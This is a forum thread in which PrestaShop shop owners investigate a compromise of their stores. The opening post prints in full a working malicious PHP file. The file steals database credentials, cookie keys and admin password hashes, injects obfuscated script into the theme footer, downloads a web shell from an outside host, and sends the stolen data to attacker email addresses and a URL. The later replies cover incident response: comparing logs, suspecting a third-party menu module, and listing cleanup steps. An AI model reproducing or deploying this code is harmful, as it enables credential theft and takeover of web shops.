199 replies to this topic

[Muller]

Hi all,

I use an SCM system, I was just about to commit some files when I see in the "unversioned" list of files a new file which I did not remember creating. It's called "her.php" and it sits under the modules directory. So I opened it with a php editor, and here is the content:

<?php
error_reporting(0);
$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";
$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  
$msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";
$mails = "samuvel_hitroy@aol.com, preop@gmx.com";
function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}
@include("../config/settings.inc.php");
///Host info
$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";
///Server info
$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";
///GET admin
mysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);
mysql_selectdb(_DB_NAME_);
$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");
while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}
//Wride sploit
@deletedir("../tools/smarty/compile/");
@deletedir("../tools/smarty/cache/"); 
@deletedir("../tools/smarty_v2/"); 
@deletedir("../tools/smarty_v2/"); 
$fn = "../themes/"._THEME_NAME_."/footer.tpl";
$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);
$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);
$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); 
if($rf>0) $wrres = "true"; else $wrres = "false";
//write shell
$sh = file_get_contents($shurl);
$shf = "../upload/".md5(date("r")).".php"; 
$f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);
$shf2 = "../download/".md5(date("r")).".php"; 
$f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);
@unlink("../download/.htaccess");
$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";
@mail($mails,"new shop",$msg);
@file_get_contents($msgurl."?data=".base64_encode($msg));
@unlink(__FILE__);
?>

That looks like they're emailing all the back office user/passwords to the two emails specified at the top of the code.

Did someone hack into my computer and put this file there?
What do you think guys?

I'm running an anti-virus check obviously as I write this...

[whitelighter]

Weird, I had the same file, created today. It could be a new exploit or a timed virus that downloads this file on a given day. This is definitely created specifically for prestashop.

You should check your upload and download directories for php files, that are not named index.php. You should check your theme folder, footer.tpl file. It might have some new javascript at the end.

This file does send the username and passwords of employees. But that is useless, the passwords are hashed so you can not use them for login. But it also sends your database user name and password. You might want to change them just in case. If your mysql server is accessible externally they will be able to login.

[Muller]

Thanks.

I posted this on Reddit at:
http://www.reddit.co...mputer_help_me/

I'm getting help there. I discovered new files in the download and upload directory, as well as modifications in my theme's footer.tpl which I deleted.

The file was only run on my localhost, not on the live server.

[Maxence de Flotte]

Hi,


What is your hosting service?
What is the ftp manager you used? (FileZilla?)
Does this file was on local?


Best regards,

[Muller]

The file was not placed on the live sever, only on my local machine.
I'm running 1.4.3.0.

Please go to the link I posted in my previous reply to Reddit.com, as some guys helped there finding out what the script actually does.

The question is how it happened, and how we stop it from happening again.

[ruilong]

I have seen the same thing on another shop today.
Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found.

[Muller]

ruilong, on 23 August 2011 - 05:15 PM, said:

I have seen the same thing on another shop today.
Can you give us a list of 3rd party modules you use in your shop, and I can see if the same modules are used in the affected shop i found.

The only modules I use are the ones that came with 1.4.3.0. The only module I downloaded from prestashop.com is their own authorize.net SIM module. That's the only module I installed that did not came with Prestashop already.

[FlyHigh]

I just started using PrestaShop a few days ago to discover what's it all about - It works great, despite the hack today:

* working on an online server, the public_html was protected by .htaccess (this protection was disabled when I found out about it).
* I can't find her.php on the server anymore (in the apache-log I can see it)

Is there any more information I can give to help out what this caused?

* PrestaShop: 1.4.4.0
* Theme: Matrice

[Mike Kranzler]

Hi Muller,
First of all, I want to let you know that we take this sort of situation extremely seriously, and have already assigned it as the top priority to our most qualified developer, Maxence (who as you can see, is already on the case). He is investigating it to try to locate the source, even if it is from an external module. If you would like to speak with him directly, we invite you to MP him to give him any additional information that could be helpful.

I will let you know as soon as I receive more news, but please just know that we are working very hard to ensure that this will not happen again, not to you or anyone else in the PrestaShop community.

-Mike

[thehandlestudio]

I have also had the same thing happen tonight about 1 hour ago and I am looking for the source.

I think hta access files have been added as well as a script in the download folder but i can't open it.

Regards,

Mark.

[Mike Kranzler]

We're working to find the solution for you, but in the meantime, you may want to check the suggestions posted on the reddit link that Muller posted near the top. Take those suggestions with a grain of salt, but they may be worth exploring on your local machine after a back-up.

-Mike

[FlyHigh]

I've checked the Apache Usage logs, couldn't find an other IP address than mine.
There was a GET command to her.php ... [23/Aug/2011:17:44:21 +0200] "GET /modules/her.php HTTP/1.1" 200 304 ...

In Download & Upload is a new file named: f48be302135d80a289c0e56fae37952e.php
These files are also dated 23/aug 17:44 - the same time footer.tpl changed.

Did it happen at the same time for everyone?

[designguy79]

This also happened to me, running 1.4.3

I couldn't find the "her.php" but my footer.tpl was definitely changed.

The only 3rd party module I had installed was jbx_menu.

Did anyone else have this happen while running 1.4.4?

[kapowchis]

Also happening in 1.4.4

[designguy79]

Dang it, I hope they can find the source of the problem soon. Just launched the site live, otherwise I would take it down. Might have to anyway!

Also, I am not familiar with the correct PrestaShop .htaccess file. How do I know what to remove from there? (I have cleaned everything else up)

[AKJV]

Wow, this looks serious.
I discovered today that I have the same issue. I thought that I was the only with a compromised Prestashop installation, till I read this topic.

I'm running a 1.4.4 version, updated from 1.4.3

Today, I saw that my FO was messed up: the Category block was empty, my slideshow stopped working and the footer has shifted upwards. When I use Firebug to check the html rendered code, I saw links to 2 external sites. I'm afraid I don't remember anymore which sites those were linking to...

I checked my footer.tpl and found weird and suspicious code at the bottom. In addition, php files were added to the /upload and /download folders. Also, the .htaccess file (to deny access) in the /download folder was gone.

In my case, this happened right after I've uploaded an html email file to my /mails/xx folder. This file was from someone else on the forum who I'm helping with an email layout problem. So my initial reaction was that this HTML file was somehow infected but seeing similar issues with others, I wonder if that's the case...

I've attached both footer.tpl (with just the weird code) and one of added php files so the developers can have a look at it.

Attached Files

•  compromised.zip   20.23K   76 downloads

[Rolo Tomasi]

I'm running 1.4.4 and my site went down at 2:00pm UK time. My webhost has just pointed me to this thread and I have the same files added to my upload and download folders along with the addition to the footer.tpl file.

[kapowchis]

The footer.tpl file and a file named menu.3 within the "cache" folder from the "jbx_menu" module were modified at the same time, so i dont know if that´s relevant or not.

[AKJV]

I'm using jbx_menu as well...
Can all the people who have posted here and encountered the same problem confirm that they are using this menu?

[whitelighter]

For anyone who finds a her.php file under their modules directory, you should do the following:
- Check the file creation time, write this down and delete the file from your server.
- Go to your apache raw access logs. You should be able to access it using hosting control panel.
- Find the line that corresponds to the file creation time you wrote down earlier.
- Copy the section starting 5 minutes before to 5 minutes after. Save it in a text file and share it here.
This data would help identify the root of the problem.

To see if you have been attacked, check the following:
- Is there any php file under your uploads or downloads directory apart from index.php?
- Is there a strange javascript at the end of your footer.tpl file?

If any of the above happens, change your mysql username and password.